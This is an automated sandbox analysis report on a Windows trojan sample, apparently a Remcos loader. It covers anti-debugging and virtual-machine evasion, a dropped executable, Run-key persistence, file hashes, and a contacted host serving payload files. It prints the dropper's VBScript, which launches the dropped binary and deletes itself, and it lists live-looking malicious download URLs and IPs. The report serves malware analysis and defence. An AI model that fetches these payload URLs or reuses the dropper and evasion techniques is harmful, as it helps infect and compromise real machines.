      Source: C:\Windows\SysWOW64\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00566C78 rdtsc
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWo
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:U
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exe, 00000013.00000002.824158146.0000000000936000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: SecuriteInfo.com.Variant.Razy.845229.27038.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005604B6 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00566C78 rdtsc
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00563E23 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00562286 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00563008 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00562034 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005661D3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005661C4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00564A7C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00566207 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00561AA2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_005622A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeCode function: 19_2_00565364 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
      Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
      Source: win.exe, 00000017.00000002.850782313.0000000000C40000.00000002.00000001.sdmp, win.exe, 00000018.00000002.850433876.0000000000CD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting11Registry Run Keys / Startup Folder1Process Injection12Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion22LSASS MemorySecurity Software Discovery731Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion22SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery212Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 356590 Sample: SecuriteInfo.com.Variant.Ra... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 38 Multi AV Scanner detection for domain / URL 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 4 other signatures 2->44 9 SecuriteInfo.com.Variant.Razy.845229.27038.exe 1 2->9         started        12 win.exe 1 2->12         started        process3 signatures4 50 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 9->50 52 Tries to detect virtualization through RDTSC time measurements 9->52 54 Contains functionality to hide a thread from the debugger 9->54 14 SecuriteInfo.com.Variant.Razy.845229.27038.exe 4 10 9->14         started        process5 dnsIp6 32 mtspsmjeli.sch.id 103.150.60.242, 49754, 80 PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID unknown 14->32 28 C:\Users\user\AppData\Roaming\win.exe, PE32 14->28 dropped 30 C:\Users\user\...\win.exe:Zone.Identifier, ASCII 14->30 dropped 34 Tries to detect Any.run 14->34 36 Hides threads from debuggers 14->36 19 wscript.exe 1 14->19         started        file7 signatures8 process9 process10 21 cmd.exe 1 19->21         started        process11 23 win.exe 1 21->23         started        26 conhost.exe 21->26         started        signatures12 46 Multi AV Scanner detection for dropped file 23->46 48 Machine Learning detection for dropped file 23->48

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SecuriteInfo.com.Variant.Razy.845229.27038.exe35%VirustotalBrowse
      SecuriteInfo.com.Variant.Razy.845229.27038.exe40%ReversingLabsWin32.Trojan.Razy
      SecuriteInfo.com.Variant.Razy.845229.27038.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\win.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\win.exe35%VirustotalBrowse
      C:\Users\user\AppData\Roaming\win.exe40%ReversingLabsWin32.Trojan.Razy

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      mtspsmjeli.sch.id12%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin13%VirustotalBrowse
      http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      mtspsmjeli.sch.id
      103.150.60.242
      truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bintrue
      • 13%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      103.150.60.242
      unknownunknown
      45325PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaIDtrue

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:356590
      Start date:23.02.2021
      Start time:11:49:35
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 9m 42s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:SecuriteInfo.com.Variant.Razy.845229.27038.1852 (renamed file extension from 1852 to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:25
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@10/3@1/1
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 64.4% (good quality ratio 8.4%)
      • Quality average: 5.5%
      • Quality standard deviation: 15.1%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      Warnings:
      Show All
      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
      • TCP Packets have been reduced to 100
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 92.122.145.220, 13.88.21.125, 13.64.90.137, 104.43.193.48, 104.43.139.144, 51.104.139.180, 52.147.198.201, 52.255.188.83, 51.103.5.159, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.20.56
      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      11:54:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
      11:54:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      103.150.60.242Lowes_Quotation_PN1092021.xlsxGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/VOP.exe
      4AtUJN8Hdu.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
      XP 6.xlsxGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/CUN.exe
      Emirates NDB bank_Remittance.xlsxGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/AWT.exe
      TT.xlsxGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/TT_2021_Remcos%20v2_DDoOoaFhuj99.bin
      w0JlVAbpIT.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
      3661RJTi5M.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
      TgrhfQLDyB.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
      Bjdl7RO0K8.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
      4hW0TZqN01.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/Mekino_nanocore_RYgvWj50.bin
      vTQWcy77WI.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
      LdOgPDsMEf.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
      6QlgtXWPBZ.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
      OXplew3YfS.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/Eric_2021_XfqsmM221.bin
      pWokqkAwi2.exeGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
      FT102038332370.xlsxGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/OSE.exe
      UOB bank_Remittance_Form.xlsxGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/AQT.exe
      Payment Confirmation .xlsxGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/AET.exe
      Sales Acknowledgement SA00004804.docGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/UDI.exe
      14 nights highlight tour.docGet hashmaliciousBrowse
      • mtspsmjeli.sch.id/Img/WAH.exe

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      mtspsmjeli.sch.idLowes_Quotation_PN1092021.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      4AtUJN8Hdu.exeGet hashmaliciousBrowse
      • 103.150.60.242
      XP 6.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      Emirates NDB bank_Remittance.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      TT.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      w0JlVAbpIT.exeGet hashmaliciousBrowse
      • 103.150.60.242
      3661RJTi5M.exeGet hashmaliciousBrowse
      • 103.150.60.242
      TgrhfQLDyB.exeGet hashmaliciousBrowse
      • 103.150.60.242
      Bjdl7RO0K8.exeGet hashmaliciousBrowse
      • 103.150.60.242
      4hW0TZqN01.exeGet hashmaliciousBrowse
      • 103.150.60.242
      vTQWcy77WI.exeGet hashmaliciousBrowse
      • 103.150.60.242
      LdOgPDsMEf.exeGet hashmaliciousBrowse
      • 103.150.60.242
      6QlgtXWPBZ.exeGet hashmaliciousBrowse
      • 103.150.60.242
      OXplew3YfS.exeGet hashmaliciousBrowse
      • 103.150.60.242
      pWokqkAwi2.exeGet hashmaliciousBrowse
      • 103.150.60.242
      FT102038332370.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      UOB bank_Remittance_Form.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      Payment Confirmation .xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      Sales Acknowledgement SA00004804.docGet hashmaliciousBrowse
      • 103.150.60.242
      14 nights highlight tour.docGet hashmaliciousBrowse
      • 103.150.60.242

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaIDLowes_Quotation_PN1092021.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      4AtUJN8Hdu.exeGet hashmaliciousBrowse
      • 103.150.60.242
      XP 6.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      Emirates NDB bank_Remittance.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      TT.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      w0JlVAbpIT.exeGet hashmaliciousBrowse
      • 103.150.60.242
      3661RJTi5M.exeGet hashmaliciousBrowse
      • 103.150.60.242
      TgrhfQLDyB.exeGet hashmaliciousBrowse
      • 103.150.60.242
      Bjdl7RO0K8.exeGet hashmaliciousBrowse
      • 103.150.60.242
      4hW0TZqN01.exeGet hashmaliciousBrowse
      • 103.150.60.242
      vTQWcy77WI.exeGet hashmaliciousBrowse
      • 103.150.60.242
      LdOgPDsMEf.exeGet hashmaliciousBrowse
      • 103.150.60.242
      6QlgtXWPBZ.exeGet hashmaliciousBrowse
      • 103.150.60.242
      OXplew3YfS.exeGet hashmaliciousBrowse
      • 103.150.60.242
      pWokqkAwi2.exeGet hashmaliciousBrowse
      • 103.150.60.242
      FT102038332370.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      UOB bank_Remittance_Form.xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      Payment Confirmation .xlsxGet hashmaliciousBrowse
      • 103.150.60.242
      Sales Acknowledgement SA00004804.docGet hashmaliciousBrowse
      • 103.150.60.242
      14 nights highlight tour.docGet hashmaliciousBrowse
      • 103.150.60.242

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\install.vbs
      Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
      File Type:data
      Category:modified
      Size (bytes):404
      Entropy (8bit):3.476487137149483
      Encrypted:false
      SSDEEP:12:4D8o++ugypjBQMBvFQ4lOAMJnAGF0M/0aimi:4Dh+S0FNOj7F0Nait
      MD5:0AC72B36AE19DF5DD84381E07A64BA3B
      SHA1:194801CB7059E67ABF5A38E709D856A8095A71EE
      SHA-256:B17BD1B45A2144EAA120C3EE9BB97622B2A54B0D36A69B3750AF2678D359D14D
      SHA-512:DA76EC5A6C11DE83532AED125DF88B43BABD72774EC8A91C05697E4941F9C8DB2757402787C40EB08DFD82A0927A8A301F84FEE5EDE10D2DB56CC7B0BB429604
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.w.i.n...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
      C:\Users\user\AppData\Roaming\win.exe
      Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):106496
      Entropy (8bit):5.194335934479938
      Encrypted:false
      SSDEEP:1536:Bb7/1JxTzAXah9um4sC0COiM9vuDjb7/1Jx:vzAqnQ0eM9i
      MD5:869EAE0220A293DCABF4051DD323BBD8
      SHA1:395E7683548C8A25C4963E3E3C56B04B76DBF0B7
      SHA-256:496FA2A5A6ABBC22D6A4C63E31847156D61C240D8E3A793E1B4DE46E09827B52
      SHA-512:DD9FB27D7554C13C691CF8836911C9B7E93FE83908895DE00D92C11A68EC2050B26D2ED2F7B8F76A7990F5F7A42E8468A2B5078378D5DAD653D71C07D95B8705
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      • Antivirus: Virustotal, Detection: 35%, Browse
      • Antivirus: ReversingLabs, Detection: 40%
      Reputation:low
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L...\..H.................@...p......x........P....@.................................I\.......................................>..(........0..................................................................8... ....................................text....3.......@.................. ..`.data...`%...P.......P..............@....rsrc....0.......@...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\win.exe:Zone.Identifier
      Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.27038.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:true
      Reputation:high, very likely benign file
      Preview: [ZoneTransfer]....ZoneId=0

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):5.194335934479938
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.15%
      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:SecuriteInfo.com.Variant.Razy.845229.27038.exe
      File size:106496
      MD5:869eae0220a293dcabf4051dd323bbd8
      SHA1:395e7683548c8a25c4963e3e3c56b04b76dbf0b7
      SHA256:496fa2a5a6abbc22d6a4c63e31847156d61c240d8e3a793e1b4de46e09827b52
      SHA512:dd9fb27d7554c13c691cf8836911c9b7e93fe83908895de00d92c11a68ec2050b26d2ed2f7b8f76a7990f5f7a42e8468a2b5078378d5dad653d71c07d95b8705
      SSDEEP:1536:Bb7/1JxTzAXah9um4sC0COiM9vuDjb7/1Jx:vzAqnQ0eM9i
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L...\..H.................@...p......x........P....@

      File Icon

      Icon Hash:d8d490d4ccbcdeeb

      Static PE Info

      General

      Entrypoint:0x401378
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      DLL Characteristics:
      Time Stamp:0x48C5A15C [Mon Sep 8 22:04:12 2008 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:5fb04c04dc9621084e24b4642ca2fed6

      Entrypoint Preview

      Instruction
      push 0040FEB8h
      call 00007F3244D0E2D5h
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      xor byte ptr [eax], al
      add byte ptr [eax], al
      dec eax
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [edi+20h], ch
      out 82h, eax
      xchg eax, ecx
      mov ch, 39h
      dec edi
      mov dword ptr [ecx-64h], ecx
      sub byte ptr [ecx-2Dh], al
      mov edi, 00000060h
      add byte ptr [eax], al
      add byte ptr [ecx], al
      add byte ptr [eax], al
      add byte ptr [edx+00h], al
      push es
      push eax
      add dword ptr [ecx], 49h
      outsb
      imul esi, dword ptr [ebx+73h], 6C626175h
      bound esp, dword ptr [ebp+73h]
      je 00007F3244D0E357h
      bound eax, dword ptr [eax]
      add byte ptr [eax], al
      add al, dl
      inc edi
      or byte ptr [ebx], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      dec esp
      xor dword ptr [eax], eax
      or eax, E492673Ch
      sar dword ptr [esi-6772BA15h], 22h
      xchg byte ptr fs:[esi+edi], dh
      inc esp
      pop es
      movsd
      sub edx, esi
      jne 00007F3244D0E2E8h
      ror byte ptr [edx-50h], FFFFFF91h
      xor byte ptr [edx], cl
      insb
      mov dl, 6Ah
      mov bh, 3Ah
      dec edi
      lodsd
      xor ebx, dword ptr [ecx-48EE309Ah]
      or al, 00h
      stosb
      add byte ptr [eax-2Dh], ah
      xchg eax, ebx
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      in al, DAh
      add byte ptr [eax], al
      push eax
      sub eax, 0F000000h
      add byte ptr [edx+52h], al
      pop ecx
      dec esi
      push ebx
      dec ebx
      dec edi
      push esi
      push ebp
      dec esi
      push eax

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x13ef40x28.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x30a4.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
      IMAGE_DIRECTORY_ENTRY_IAT0x10000x114.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x133bc0x14000False0.338391113281data5.72023929374IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
